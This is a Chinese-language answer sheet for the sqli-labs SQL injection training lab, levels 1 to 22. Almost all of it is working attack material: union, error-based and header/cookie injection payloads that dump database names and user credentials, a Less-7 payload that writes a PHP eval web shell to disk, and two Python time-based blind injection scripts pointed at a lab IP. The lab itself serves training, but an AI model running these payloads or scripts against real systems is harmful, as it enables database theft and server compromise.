[sqli-labs]Less1~22答案

Less-1
?id=1' order by 3
#正常
?id=1' order by 4
#Unknown column '4' in 'order clause'
?id=666' union select 1,2,(select group_concat(schema_name) from information_schema.schemata) --+
# information_schema,challenges,mysql,performance_schema,security

?id=666' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema = 'security') --+
# emails,referers,uagents,users
?id=666' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name = 'users') --+
# id,username,password
?id=666' union select 1,(select group_concat(username) from security.users),(select group_concat(password) from security.users)--+

# Dumb,Angelina,   Dummy,  secure,stupid,   superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
# Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

Less-2
# 方法同上,不过此题为数值查询
?id=666 union select 1,(select group_concat(username) from security.users),(select group_concat(password) from security.users)

Less-3
?id=666') union select 1,(select group_concat(username) from security.users),(select group_concat(password) from security.users)--+ 

Less-4
?id=666") union select 1,(select group_concat(username) from security.users),(select group_concat(password) from security.users)--+ 

Less-5
# 页面没有显示位。无法使用联合查询注入 采用报错注入
# and (select 1 from (select count(*),concat((payload),floor (rand(0)*2))x from information_schema.tables group by x)a)
?id=1' and (select 1 from (select count(*),concat(((select group_concat(schema_name) from information_schema.schemata)),floor (rand(0)*2))x from information_schema.tables group by x)a) --+
# Subquery returns more than 1 row
?id=1' and (select 1 from (select count(*),concat(((select concat(schema_name,';') from information_schema.schemata limit 4, 1)),floor (rand(0)*2))x from information_schema.tables group by x)a) --+
# Duplicate entry 'security;1' for key 'group_key'
?id=1' and (select 1 from (select count(*),concat(((select concat(table_name,";") from information_schema.tables where table_schema = 'security' limit 3, 1)),floor (rand(0)*2))x from information_schema.tables group by x)a) --+
# Duplicate entry 'users;1' for key 'group_key'
# 以此类推

Less-6
# 把'换成"

Less-7
?id=-1')) union select "<?php @eval($_POST['my']);?>" into outfile "path" --+
# 一句话连上即可

Less-8
# '))改为'

Less-9&10
#区别是前者'后者"
#经过测试发现本题是时间盲注,附上脚本:
# coding:utf-8
import requests
import datetime


def database_len(url):  # 获取数据库名长度
    for i in range(1, 10):
        payload = '''?id=1' and if(length(database())>%s,sleep(1),0)''' % i
        time1 = datetime.datetime.now()
        r = requests.get(url + payload + '%23')
        time2 = datetime.datetime.now()
        sec = (time2 - time1).seconds
        if sec >= 1:
            print(i)
        else:
            print(i)
            break
    print('database_len:', i)
    return i


def database_name(url, database_len):  # 获取数据库名
    name = ''
    for j in range(1, database_len + 1):
        for i in '0123456789abcdefghijklmnopqrstuvwxyz':
            payload = '''?id=1' and if(substr(database(),%d,1)='%s',sleep(1),1)''' % (
                j, i)
            # print(url+payload+'%23')
            time1 = datetime.datetime.now()
            r = requests.get(url + payload + '%23')
            time2 = datetime.datetime.now()
            sec = (time2 - time1).seconds
            if sec >= 1:
                name += i
                print(name)
                break
    print('database_name:', name)


url = '''http://43.247.91.228:84/Less-9/'''
database_len = database_len(url)
database_name(url, database_len)
#database_name: security

Less-11
?uname=' or '1'='1&passwd=1'union select 1,(select group_concat(schema_name) from information_schema.schemata)#&submit=Submit
#' or '1'='1绕过

Less-12
?uname=") or ("1")=("1&passwd=1")union select 1,(select group_concat(schema_name) from information_schema.schemata)#&submit=Submit
#") or ("1")=("1绕过

Less-13
?uname=1') and extractvalue(1,concat(":",(select schema_name from information_schema.schemata limit 4,1)))  #
#>XPATH syntax error: ':security'
或者
?uname=1') and (select 1 from (select count(*),concat(((select concat(schema_name, " | ") from information_schema.schemata limit 4, 1)),floor (rand(0)*2))x from information_schema.tables group by x)a)  #
# Duplicate entry 'security | 1' for key 'group_key'

Less-14
把')换成"

Less-15
#没有啥反应哈,试了试万能密码确定是',然后进行时间盲注,对之前的脚本做了个升级哈,这次是多线程
# coding:utf-8
import requests
import datetime
import threading


def database_len(url, i):
    postdata = {
        'uname': '''admin' and if(length(database())>%s,sleep(2),0) #''' % i,
        'passwd': '''1'''
    }
    time1 = datetime.datetime.now()
    r = requests.post(url, data=postdata)
    time2 = datetime.datetime.now()
    sec = (time2 - time1).seconds
    if sec >= 2:
        return True
    else:
        return False


def database_name(url, j):  # 获取数据库名
    for i in '0123456789abcdefghijklmnopqrstuvwxyz':
        postdata = {
            'uname': '''admin' and if(substr(database(),%d,1)='%s',sleep(2),1) #''' % (j, i),
            'passwd': '''1'''
        }
        # print(url+payload+'%23')
        time1 = datetime.datetime.now()
        r = requests.post(url, data=postdata)
        time2 = datetime.datetime.now()
        sec = (time2 - time1).seconds
        if sec >= 2:
            return i


class MyThread(threading.Thread):
    def __init__(self, func, args):
        threading.Thread.__init__(self)
        self.func = func
        self.args = args

    def getresult(self):
        return self.res

    def run(self):
        self.res = self.func(*self.args)


def main():
    flag = True
    url = '''http://43.247.91.228:84/Less-15/'''
    while flag:
        threads = []
        for i in range(0, 9):
            t = MyThread(database_len, (url, i + 1))
            threads.append(t)
            threads[i].start()
        for i in range(0, 9):
            threads[i].join()
            if not threads[i].getresult():
                flag = False
                databaselength = i + 1
                print('database_len:', databaselength)
                break
    threads = []
    name = ''
    for i in range(0, databaselength):
        t = MyThread(database_name, (url, i + 1))
        threads.append(t)
        threads[i].start()
    for i in range(0, databaselength):
        threads[i].join()
        name += threads[i].getresult()
    print("database_name :" + name)


if __name__ == '__main__':
    main()

#database_len: 8
#database_name :security

Less-16
'改成")

Less-17
#尝试了一会儿发现这里只有知道用户名才能进行注入哈,随便试了个admin发现可以,在密码发现有语法报错,于是采用报错注入
?uname=admin&passwd=1' and (select 1 from (select count(*),concat(((select concat(schema_name, " | ") from information_schema.schemata limit 4, 1)),floor (rand(0)*2))x from information_schema.tables group by x)a)  #&submit=Submit

Less-18
#发现页面会返回ip和user-agent,改了下xxf发现不行呀,于是尝试在user-agent注入
User-Agent:1' and extractvalue(1,concat(":",(select schema_name from information_schema.schemata limit 4,1)))  and '1'='1
# XPATH syntax error:':security'

Less-19
#显示位在referer,所以尝试在这里注入
Referer:1' and (select 1 from (select count(*),concat(((select concat(schema_name,';') from information_schema.schemata limit 4, 1)),floor (rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
uname=admin&passwd=admin&submit=Submit
#"security;1"

Less-20
#在cookie里面注入
Cookie: uname=' and extractvalue(1,concat(":",(select schema_name from information_schema.schemata limit 4,1)))  and '1'='1

Less-21
Cookie: uname=JyBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KCI6Iiwoc2VsZWN0IHNjaGVtYV9uYW1lIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnNjaGVtYXRhIGxpbWl0IDQsMSkpKSAgYW5kICcxJz0nMQ==
# 观察了一下要base64,这种形式还是第一次见2333

Less-22
#和上题一样哈,不过把'改成"
Cookie: uname=IiBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KCI6Iiwoc2VsZWN0IHNjaGVtYV9uYW1lIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnNjaGVtYXRhIGxpbWl0IDQsMSkpKSAgYW5kICIxIj0iMQ==